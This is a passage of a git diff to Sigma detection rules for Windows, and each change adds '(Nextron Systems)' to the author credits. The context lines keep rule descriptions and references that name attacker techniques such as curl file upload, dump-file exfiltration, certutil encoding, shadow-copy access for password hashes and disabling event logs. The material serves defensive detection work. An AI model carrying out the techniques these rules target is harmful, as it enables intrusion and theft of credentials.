https://blogs.technet.microsoft.com/jonathantrull/2016/10/03/detecting-sticky-key-backdoors/ -author: Florian Roth, @twjackomo, Jonhnathan Ribeiro, oscd.community +author: Florian Roth (Nextron Systems), @twjackomo, Jonhnathan Ribeiro, oscd.community date: 2018/03/15 modified: 2021/09/12 tags: diff --git a/rules/windows/process_creation/proc_creation_win_susp_3proxy_usage.yml b/rules/windows/process_creation/proc_creation_win_susp_3proxy_usage.yml index 03f94f14c..939b518f7 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_3proxy_usage.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_3proxy_usage.yml @@ -5,7 +5,7 @@ description: Detects the use of 3proxy, a tiny free proxy server references: - https://github.com/3proxy/3proxy - https://blog.talosintelligence.com/2022/09/lazarus-three-rats.html -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2022/09/13 modified: 2023/01/05 tags: diff --git a/rules/windows/process_creation/proc_creation_win_susp_7zip_dmp.yml b/rules/windows/process_creation/proc_creation_win_susp_7zip_dmp.yml index be971492c..f73dc3a80 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_7zip_dmp.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_7zip_dmp.yml @@ -7,7 +7,7 @@ status: experimental description: Detects a suspicious 7zip execution that involves a file with a .dmp extension, which could be a step in a process of dump file exfiltration references: - https://thedfirreport.com/2022/09/26/bumblebee-round-two/ -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2022/09/27 tags: - attack.collection diff --git a/rules/windows/process_creation/proc_creation_win_susp_add_local_admin.yml b/rules/windows/process_creation/proc_creation_win_susp_add_local_admin.yml index 2dd54108c..ba86d4eae 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_add_local_admin.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_add_local_admin.yml @@ -7,7 +7,7 @@ status: experimental description: Detects suspicious command line that adds an account to the local administrators/administrateurs group references: - https://blog.talosintelligence.com/2022/08/recent-cyber-attack.html?m=1 -author: Florian Roth, Nasreddine Bencherchali +author: Florian Roth (Nextron Systems), Nasreddine Bencherchali date: 2022/08/12 modified: 2022/09/09 tags: diff --git a/rules/windows/process_creation/proc_creation_win_susp_add_user_remote_desktop.yml b/rules/windows/process_creation/proc_creation_win_susp_add_user_remote_desktop.yml index bb6938151..88e86451e 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_add_user_remote_desktop.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_add_user_remote_desktop.yml @@ -7,7 +7,7 @@ status: experimental description: Detects suspicious command line in which a user gets added to the local Remote Desktop Users group references: - https://www.microsoft.com/security/blog/2021/11/16/evolving-trends-in-iranian-threat-actor-activity-mstic-presentation-at-cyberwarcon-2021/ -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2021/12/06 modified: 2022/09/09 tags: diff --git a/rules/windows/process_creation/proc_creation_win_susp_advancedrun.yml b/rules/windows/process_creation/proc_creation_win_susp_advancedrun.yml index 24bbed6fd..f26cae65a 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_advancedrun.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_advancedrun.yml @@ -7,7 +7,7 @@ references: - https://medium.com/s2wblog/analysis-of-destructive-malware-whispergate-targeting-ukraine-9d5d158f19f3 - https://elastic.github.io/security-research/malware/2022/01/01.operation-bleeding-bear/article/ - https://www.winhelponline.com/blog/run-program-as-system-localsystem-account-windows/ -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2022/01/20 modified: 2022/05/13 logsource: diff --git a/rules/windows/process_creation/proc_creation_win_susp_advancedrun_priv_user.yml b/rules/windows/process_creation/proc_creation_win_susp_advancedrun_priv_user.yml index 4507fd091..1ede7e0f2 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_advancedrun_priv_user.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_advancedrun_priv_user.yml @@ -7,7 +7,7 @@ references: - https://medium.com/s2wblog/analysis-of-destructive-malware-whispergate-targeting-ukraine-9d5d158f19f3 - https://elastic.github.io/security-research/malware/2022/01/01.operation-bleeding-bear/article/ - https://www.winhelponline.com/blog/run-program-as-system-localsystem-account-windows/ -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2022/01/20 modified: 2022/05/05 logsource: diff --git a/rules/windows/process_creation/proc_creation_win_susp_appx_execution.yml b/rules/windows/process_creation/proc_creation_win_susp_appx_execution.yml index fccb3b1b4..51d9229d2 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_appx_execution.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_appx_execution.yml @@ -5,7 +5,7 @@ description: Detects suspicious children of application launched from inside the references: - https://news.sophos.com/en-us/2021/11/11/bazarloader-call-me-back-attack-abuses-windows-10-apps-mechanism/ - https://www.sentinelone.com/labs/inside-malicious-windows-apps-for-malware-deployment/ -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2023/01/12 tags: - attack.defense_evasion diff --git a/rules/windows/process_creation/proc_creation_win_susp_base64_load.yml b/rules/windows/process_creation/proc_creation_win_susp_base64_load.yml index b16f26f0e..71e064393 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_base64_load.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_base64_load.yml @@ -8,7 +8,7 @@ description: Detects suspicious base64 encoded and obbfuscated LOAD string often references: - https://github.com/Neo23x0/Raccine/blob/20a569fa21625086433dcce8bb2765d0ea08dcb6/yara/mal_revil.yar - https://thedfirreport.com/2022/05/09/seo-poisoning-a-gootloader-story/ -author: pH-T +author: pH-T (Nextron Systems) date: 2022/03/01 modified: 2022/05/20 tags: diff --git a/rules/windows/process_creation/proc_creation_win_susp_builtin_commands_recon.yml b/rules/windows/process_creation/proc_creation_win_susp_builtin_commands_recon.yml index dfe52de30..e956c0929 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_builtin_commands_recon.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_builtin_commands_recon.yml @@ -6,7 +6,7 @@ references: - https://twitter.com/haroonmeer/status/939099379834658817 - https://twitter.com/c_APT_ure/status/939475433711722497 - https://www.fireeye.com/blog/threat-research/2016/05/targeted_attacksaga.html -author: Florian Roth, Markus Neis +author: Florian Roth (Nextron Systems), Markus Neis date: 2018/08/22 modified: 2022/10/05 tags: diff --git a/rules/windows/process_creation/proc_creation_win_susp_calc.yml b/rules/windows/process_creation/proc_creation_win_susp_calc.yml index 2666e7c5d..0745eca5c 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_calc.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_calc.yml @@ -4,7 +4,7 @@ status: test description: Detects suspicious use of 'calc.exe' with command line parameters or in a suspicious directory, which is likely caused by some PoC or detection evasion references: - https://twitter.com/ItsReallyNick/status/1094080242686312448 -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2019/02/09 modified: 2022/11/07 tags: diff --git a/rules/windows/process_creation/proc_creation_win_susp_certutil_command.yml b/rules/windows/process_creation/proc_creation_win_susp_certutil_command.yml index 726e3c7f1..7a898b8d0 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_certutil_command.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_certutil_command.yml @@ -8,7 +8,7 @@ references: - https://www.trustedsec.com/2017/07/new-tool-release-nps_payload/ - https://twitter.com/egre55/status/1087685529016193025 - https://lolbas-project.github.io/lolbas/Binaries/Certutil/ -author: Florian Roth, juju4, keepwatch +author: Florian Roth (Nextron Systems), juju4, keepwatch date: 2019/01/16 modified: 2022/10/12 tags: diff --git a/rules/windows/process_creation/proc_creation_win_susp_certutil_encode.yml b/rules/windows/process_creation/proc_creation_win_susp_certutil_encode.yml index ec9580992..110139a53 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_certutil_encode.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_certutil_encode.yml @@ -5,7 +5,7 @@ description: Detects suspicious a certutil command that used to encode files, wh references: - https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/certutil - https://unit42.paloaltonetworks.com/new-babyshark-malware-targets-u-s-national-security-think-tanks/ -author: Florian Roth, Jonhnathan Ribeiro, oscd.community +author: Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community date: 2019/02/24 modified: 2022/01/07 tags: diff --git a/rules/windows/process_creation/proc_creation_win_susp_clsid_foldername.yml b/rules/windows/process_creation/proc_creation_win_susp_clsid_foldername.yml index 6c8e07fec..3d1a14128 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_clsid_foldername.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_clsid_foldername.yml @@ -4,7 +4,7 @@ status: experimental description: Detects usage of a CLSID folder name located in a suspicious location from the commandline as seen being used in IcedID references: - https://twitter.com/Kostastsale/status/1565257924204986369 -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2022/09/01 modified: 2022/12/15 tags: diff --git a/rules/windows/process_creation/proc_creation_win_susp_cmd_http_appdata.yml b/rules/windows/process_creation/proc_creation_win_susp_cmd_http_appdata.yml index f3c9e28a1..56a2af66b 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_cmd_http_appdata.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_cmd_http_appdata.yml @@ -5,7 +5,7 @@ description: Detects a suspicious command line execution that includes an URL an references: - https://www.hybrid-analysis.com/sample/3a1f01206684410dbe8f1900bbeaaa543adfcd07368ba646b499fa5274b9edf6?environmentId=100 - https://www.hybrid-analysis.com/sample/f16c729aad5c74f19784a24257236a8bbe27f7cdc4a89806031ec7f1bebbd475?environmentId=100 -author: Florian Roth, Jonhnathan Ribeiro, oscd.community +author: Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community date: 2019/01/16 modified: 2021/11/27 tags: diff --git a/rules/windows/process_creation/proc_creation_win_susp_cmd_shadowcopy_access.yml b/rules/windows/process_creation/proc_creation_win_susp_cmd_shadowcopy_access.yml index fd1b0e589..9419d1f91 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_cmd_shadowcopy_access.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_cmd_shadowcopy_access.yml @@ -6,7 +6,7 @@ references: - https://twitter.com/vxunderground/status/1423336151860002816?s=20 - https://www.virustotal.com/gui/file/03e9b8c2e86d6db450e5eceec057d7e369ee2389b9daecaf06331a95410aa5f8/detection - https://pentestlab.blog/2018/07/04/dumping-domain-password-hashes/ -author: Max Altgelt, Tobias Michalski +author: Max Altgelt (Nextron Systems), Tobias Michalski (Nextron Systems) date: 2021/08/09 modified: 2022/08/13 tags: diff --git a/rules/windows/process_creation/proc_creation_win_susp_codepage_switch.yml b/rules/windows/process_creation/proc_creation_win_susp_codepage_switch.yml index 1ebbb61ab..f29b48c6e 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_codepage_switch.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_codepage_switch.yml @@ -5,7 +5,7 @@ description: Detects a code page switch in command line or batch scripts to a ra references: - https://docs.microsoft.com/en-us/windows/win32/intl/code-page-identifiers - https://twitter.com/cglyer/status/1183756892952248325 -author: Florian Roth, Jonhnathan Ribeiro, oscd.community +author: Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community date: 2019/10/14 modified: 2022/01/07 tags: diff --git a/rules/windows/process_creation/proc_creation_win_susp_command_flag_pattern.yml b/rules/windows/process_creation/proc_creation_win_susp_command_flag_pattern.yml index 9acbd7d38..7520c28b6 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_command_flag_pattern.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_command_flag_pattern.yml @@ -4,7 +4,7 @@ status: experimental description: Detects suspicious command line flags that let the user set a target user and command as e.g. seen in PsExec-like tools references: - https://www.trendmicro.com/en_us/research/22/k/hack-the-real-box-apt41-new-subgroup-earth-longzhi.html -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2022/11/11 logsource: category: process_creation diff --git a/rules/windows/process_creation/proc_creation_win_susp_commandline_chars.yml b/rules/windows/process_creation/proc_creation_win_susp_commandline_chars.yml index 933335f9e..0c4de8255 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_commandline_chars.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_commandline_chars.yml @@ -4,7 +4,7 @@ status: experimental description: Detects suspicious Unicode characters in the command line, which could be a sign of obfuscation or defense evasion references: - https://www.wietzebeukema.nl/blog/windows-command-line-obfuscation -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2022/04/27 logsource: product: windows diff --git a/rules/windows/process_creation/proc_creation_win_susp_compression_params.yml b/rules/windows/process_creation/proc_creation_win_susp_compression_params.yml index 4a289f522..b9579e098 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_compression_params.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_compression_params.yml @@ -4,7 +4,7 @@ status: test description: Detects suspicious command line arguments of common data compression tools references: - https://twitter.com/SBousseaden/status/1184067445612535811 -author: Florian Roth, Samir Bousseaden +author: Florian Roth (Nextron Systems), Samir Bousseaden date: 2019/10/15 modified: 2021/11/27 tags: diff --git a/rules/windows/process_creation/proc_creation_win_susp_control_dll_load.yml b/rules/windows/process_creation/proc_creation_win_susp_control_dll_load.yml index 6068e526a..c69ce5808 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_control_dll_load.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_control_dll_load.yml @@ -4,7 +4,7 @@ status: test description: Detects suspicious Rundll32 execution from control.exe as used by Equation Group and Exploit Kits references: - https://twitter.com/rikvduijn/status/853251879320662017 -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2017/04/15 modified: 2021/11/27 tags: diff --git a/rules/windows/process_creation/proc_creation_win_susp_copy_lateral_movement.yml b/rules/windows/process_creation/proc_creation_win_susp_copy_lateral_movement.yml index 6c971e5f2..23771fa48 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_copy_lateral_movement.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_copy_lateral_movement.yml @@ -7,7 +7,7 @@ references: - https://drive.google.com/file/d/1lKya3_mLnR3UQuCoiYruO3qgu052_iS_/view - https://www.elastic.co/guide/en/security/current/remote-file-copy-to-a-hidden-share.html - https://www.microsoft.com/en-us/security/blog/2022/10/18/defenders-beware-a-case-for-post-ransomware-investigations/ -author: 'Florian Roth, oscd.community, Teymur Kheirkhabarov @HeirhabarovT, Zach Stanford @svch0st, Nasreddine Bencherchali' +author: 'Florian Roth (Nextron Systems), oscd.community, Teymur Kheirkhabarov @HeirhabarovT, Zach Stanford @svch0st, Nasreddine Bencherchali' date: 2019/12/30 modified: 2022/12/23 tags: diff --git a/rules/windows/process_creation/proc_creation_win_susp_copy_system32.yml b/rules/windows/process_creation/proc_creation_win_susp_copy_system32.yml index 18e643ae0..dddcf3990 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_copy_system32.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_copy_system32.yml @@ -10,7 +10,7 @@ description: | references: - https://www.hybrid-analysis.com/sample/8da5b75b6380a41eee3a399c43dfe0d99eeefaa1fd21027a07b1ecaa4cd96fdd?environmentId=120 - https://web.archive.org/web/20180331144337/https://www.fireeye.com/blog/threat-research/2018/03/sanny-malware-delivery-method-updated-in-recently-observed-attacks.html -author: Florian Roth, Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (update) +author: Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems) date: 2020/07/03 modified: 2022/09/10 tags: diff --git a/rules/windows/process_creation/proc_creation_win_susp_covenant.yml b/rules/windows/process_creation/proc_creation_win_susp_covenant.yml index 241943668..530549687 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_covenant.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_covenant.yml @@ -4,7 +4,7 @@ status: test description: Detects suspicious command lines used in Covenant luanchers references: - https://posts.specterops.io/covenant-v0-5-eee0507b85ba -author: Florian Roth, Jonhnathan Ribeiro, oscd.community +author: Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community date: 2020/06/04 modified: 2021/11/27 tags: diff --git a/rules/windows/process_creation/proc_creation_win_susp_crackmapexec_flags.yml b/rules/windows/process_creation/proc_creation_win_susp_crackmapexec_flags.yml index 21d396fd5..9f515e292 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_crackmapexec_flags.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_crackmapexec_flags.yml @@ -7,7 +7,7 @@ references: - https://www.mandiant.com/resources/telegram-malware-iranian-espionage - https://www.infosecmatter.com/crackmapexec-module-library/?cmem=mssql-mimikatz - https://www.infosecmatter.com/crackmapexec-module-library/?cmem=smb-pe_inject -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2022/02/25 logsource: category: process_creation diff --git a/rules/windows/process_creation/proc_creation_win_susp_csc.yml b/rules/windows/process_creation/proc_creation_win_susp_csc.yml index fa7be8e44..2dd763878 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_csc.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_csc.yml @@ -4,7 +4,7 @@ status: test description: Detects a suspicious parent of csc.exe, which could by a sign of payload delivery references: - https://twitter.com/SBousseaden/status/1094924091256176641 -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2019/02/11 modified: 2022/01/07 tags: diff --git a/rules/windows/process_creation/proc_creation_win_susp_csc_folder.yml b/rules/windows/process_creation/proc_creation_win_susp_csc_folder.yml index ab739ef00..434a6afda 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_csc_folder.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_csc_folder.yml @@ -7,7 +7,7 @@ references: - https://www.clearskysec.com/wp-content/uploads/2018/11/MuddyWater-Operations-in-Lebanon-and-Oman.pdf - https://app.any.run/tasks/c6993447-d1d8-414e-b856-675325e5aa09/ - https://twitter.com/gN3mes1s/status/1206874118282448897 -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2019/08/24 modified: 2022/10/09 tags: diff --git a/rules/windows/process_creation/proc_creation_win_susp_csexec.yml b/rules/windows/process_creation/proc_creation_win_susp_csexec.yml index 380a2ee0a..bb4b1ddfe 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_csexec.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_csexec.yml @@ -5,7 +5,7 @@ description: Detects the use of the lesser known remote execution tool named CsE references: - https://github.com/malcomvetter/CSExec - https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself/ -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2022/08/22 tags: - attack.resource_development diff --git a/rules/windows/process_creation/proc_creation_win_susp_curl_download.yml b/rules/windows/process_creation/proc_creation_win_susp_curl_download.yml index c7fef0b90..8540c76fc 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_curl_download.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_curl_download.yml @@ -10,7 +10,7 @@ references: - https://web.archive.org/web/20200128160046/https://twitter.com/reegun21/status/1222093798009790464 - https://github.com/pr0xylife/Qakbot/blob/4f0795d79dabee5bc9dd69f17a626b48852e7869/Qakbot_AA_23.06.2022.txt - https://www.volexity.com/blog/2022/07/28/sharptongue-deploys-clever-mail-stealing-browser-extension-sharpext/ -author: Florian Roth, Nasreddine Bencherchali +author: Florian Roth (Nextron Systems), Nasreddine Bencherchali date: 2020/07/03 modified: 2023/01/11 tags: diff --git a/rules/windows/process_creation/proc_creation_win_susp_curl_fileupload.yml b/rules/windows/process_creation/proc_creation_win_susp_curl_fileupload.yml index ab027167d..ecaea4286 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_curl_fileupload.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_curl_fileupload.yml @@ -7,7 +7,7 @@ references: - https://medium.com/@petehouston/upload-files-with-curl-93064dcccc76 - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1105/T1105.md#atomic-test-19---curl-upload-file - https://curl.se/docs/manpage.html -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2020/07/03 modified: 2022/09/15 tags: diff --git a/rules/windows/process_creation/proc_creation_win_susp_dctask64_proc_inject.yml b/rules/windows/process_creation/proc_creation_win_susp_dctask64_proc_inject.yml index a0cae886c..711bfe3b4 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_dctask64_proc_inject.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_dctask64_proc_inject.yml @@ -6,7 +6,7 @@ references: - https://twitter.com/gN3mes1s/status/1222088214581825540 - https://twitter.com/gN3mes1s/status/1222095963789111296 - https://twitter.com/gN3mes1s/status/1222095371175911424 -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2020/01/28 modified: 2021/11/27 tags: diff --git a/rules/windows/process_creation/proc_creation_win_susp_desktopimgdownldr.yml b/rules/windows/process_creation/proc_creation_win_susp_desktopimgdownldr.yml index db11754e0..e3bd3dc00 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_desktopimgdownldr.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_desktopimgdownldr.yml @@ -5,7 +5,7 @@ description: Detects a suspicious Microsoft desktopimgdownldr execution with par references: - https://labs.sentinelone.com/living-off-windows-land-a-new-native-file-downldr/ - https://twitter.com/SBousseaden/status/1278977301745741825 -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2020/07/03 modified: 2021/11/27 tags: diff --git a/rules/windows/process_creation/proc_creation_win_susp_devinit_lolbin.yml b/rules/windows/process_creation/proc_creation_win_susp_devinit_lolbin.yml index 2fe2a00d7..f1ba11344 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_devinit_lolbin.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_devinit_lolbin.yml @@ -4,7 +4,7 @@ status: test description: Detects a certain command line flag combination used by devinit.exe lolbin to download arbitrary MSI packages on a Windows system references: - https://twitter.com/mrd0x/status/1460815932402679809 -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2022/01/11 tags: - attack.execution diff --git a/rules/windows/process_creation/proc_creation_win_susp_disable_eventlog.yml b/rules/windows/process_creation/proc_creation_win_susp_disable_eventlog.yml index 77aefc62c..4c6a03c3f 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_disable_eventlog.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_disable_eventlog.yml @@ -5,7 +5,7 @@ description: Detects command that is used to disable or delete Windows eventlog references: - https://twitter.com/0gtweet/status/1359039665232306183?s=21 - https://ss64.com/nt/logman.html -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2021/02/11 modified: 2022/12/25 tags: diff --git a/rules/windows/process_creation/proc_creation_win_susp_disable_ie_features.yml b/rules/windows/process_creation/proc_creation_win_susp_disable_ie_features.yml index 02a655f51..92b6b7390 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_disable_ie_features.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_disable_ie_features.yml @@ -4,7 +4,7 @@ status: test description: Detects command lines that indicate unwanted modifications to registry keys that disable important Internet Explorer security features references: - https://unit42.paloaltonetworks.com/operation-ke3chang-resurfaces-with-new-tidepool-malware/ -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2020/06/19 modified: 2021/11/27 tags: diff --git a/rules/windows/process_creation/proc_creation_win_susp_disable_raccine.yml b/rules/windows/process_creation/proc_creation_win_susp_disable_raccine.yml index 92b8e6308..74c40d55d 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_disable_raccine.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_disable_raccine.yml @@ -4,7 +4,7 @@ status: test description: Detects commands that indicate a Raccine removal from an end system. Raccine is a free ransomware protection tool. references: - https://github.com/Neo23x0/Raccine -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2021/01/21 modified: 2022/10/09 tags: diff --git a/rules/windows/process_creation/proc_creation_win_susp_dllhost_no_cli.yml b/rules/windows/process_creation/proc_creation_win_susp_dllhost_no_cli.yml index 01d2fc61f..3d6705937 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_dllhost_no_cli.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_dllhost_no_cli.yml @@ -5,7 +5,7 @@ description: Detects a "dllhost" spawning with no commandline arguments which is references: - https://redcanary.com/blog/child-processes/ - https://nasbench.medium.com/what-is-the-dllhost-exe-process-actually-running-ef9fe4c19c08 -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2022/06/27 tags: - attack.defense_evasion diff --git a/rules/windows/process_creation/proc_creation_win_susp_double_extension.yml b/rules/windows/process_creation/proc_creation_win_susp_double_extension.yml index fe0920fae..a6f9a96ae 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_double_extension.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_double_extension.yml @@ -5,7 +5,7 @@ description: Detects suspicious use of an .exe extension after a non-executable references: - https://blu3-team.blogspot.com/2019/06/misleading-extensions-xlsexe-docexe.html - https://twitter.com/blackorbird/status/1140519090961825792 -author: Florian Roth (rule), @blu3_team (idea) +author: Florian Roth (Nextron Systems), @blu3_team (idea) date: 2019/06/26 modified: 2021/11/27 tags: diff --git a/rules/windows/process_creation/proc_creation_win_susp_download_office_domain.yml b/rules/windows/process_creation/proc_creation_win_susp_download_office_domain.yml index 36b76e0ce..e4b41831f 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_download_office_domain.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_download_office_domain.yml @@ -5,7 +5,7 @@ description: Detects suspicious ways to download files from Microsoft domains th references: - https://twitter.com/an0n_r0/status/1474698356635193346?s=12 - https://twitter.com/mrd0x/status/1475085452784844803?s=12 -author: Florian Roth, Nasreddine Bencherchali +author: Florian Roth (Nextron Systems), Nasreddine Bencherchali date: 2021/12/27 modified: 2022/08/02 logsource: diff --git a/rules/windows/process_creation/proc_creation_win_susp_dtrace_kernel_dump.yml b/rules/windows/process_creation/proc_creation_win_susp_dtrace_kernel_dump.yml index 2971a7037..8ec78a828 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_dtrace_kernel_dump.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_dtrace_kernel_dump.yml @@ -5,7 +5,7 @@ description: Detects suspicious way to dump the kernel on Windows systems using references: - https://twitter.com/0gtweet/status/1474899714290208777?s=12 - https://docs.microsoft.com/en-us/windows-hardware/drivers/devtest/dtrace -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2021/12/28 logsource: product: windows diff --git a/rules/windows/process_creation/proc_creation_win_susp_electron_app_children.yml b/rules/windows/process_creation/proc_creation_win_susp_electron_app_children.yml index 6884e7b44..248f5e6f0 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_electron_app_children.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_electron_app_children.yml @@ -7,7 +7,7 @@ description: | references: - https://taggart-tech.com/quasar-electron/ - https://github.com/mttaggart/quasar -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2022/10/21 modified: 2022/11/09 tags: diff --git a/rules/windows/process_creation/proc_creation_win_susp_execution_path.yml b/rules/windows/process_creation/proc_creation_win_susp_execution_path.yml index a23737a8a..1e68e9960 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_execution_path.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_execution_path.yml @@ -7,7 +7,7 @@ references: - https://www.secureworks.com/research/bronze-butler-targets-japanese-businesses - https://www.crowdstrike.com/resources/reports/2019-crowdstrike-global-threat-report/ - https://github.com/ThreatHuntingProject/ThreatHunting/blob/cb22598bb70651f88e0285abc8d835757d2cb596/hunts/suspicious_process_creation_via_windows_event_logs.md -author: Florian Roth, Tim Shelton +author: Florian Roth (Nextron Systems), Tim Shelton date: 2019/01/16 modified: 2023/01/10 tags: diff --git a/rules/windows/process_creation/proc_creation_win_susp_execution_path_webserver.yml b/rules/windows/process_creation/proc_creation_win_susp_execution_path_webserver.yml index d3268e191..84912f313 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_execution_path_webserver.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_execution_path_webserver.yml @@ -2,7 +2,7 @@ title: Execution in Webserver Root Folder id: 35efb964-e6a5-47ad-bbcd-19661854018d status: test description: Detects a suspicious program execution in a web service root folder (filter out false positives) -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2019/01/16 modified: 2021/11/27 tags: diff --git a/rules/windows/process_creation/proc_creation_win_susp_explorer_break_proctree.yml b/rules/windows/process_creation/proc_creation_win_susp_explorer_break_proctree.yml index 865f402ea..2da7f1ef3 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_explorer_break_proctree.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_explorer_break_proctree.yml @@ -9,7 +9,7 @@ references: - https://twitter.com/bohops/status/1276357235954909188?s=12 - https://twitter.com/nas_bench/status/1535322450858233858 - https://securityboulevard.com/2019/09/deobfuscating-ostap-trickbots-34000-line-javascript-downloader/ -author: 'Florian Roth, Nasreddine Bencherchali, @gott_cyber' +author: 'Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems), @gott_cyber' date: 2019/06/29 modified: 2022/09/20 tags: diff --git a/rules/windows/process_creation/proc_creation_win_susp_explorer_nouaccheck.yml b/rules/windows/process_creation/proc_creation_win_susp_explorer_nouaccheck.yml index 553fdde68..789647d77 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_explorer_nouaccheck.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_explorer_nouaccheck.yml @@ -4,7 +4,7 @@ status: test description: Detects 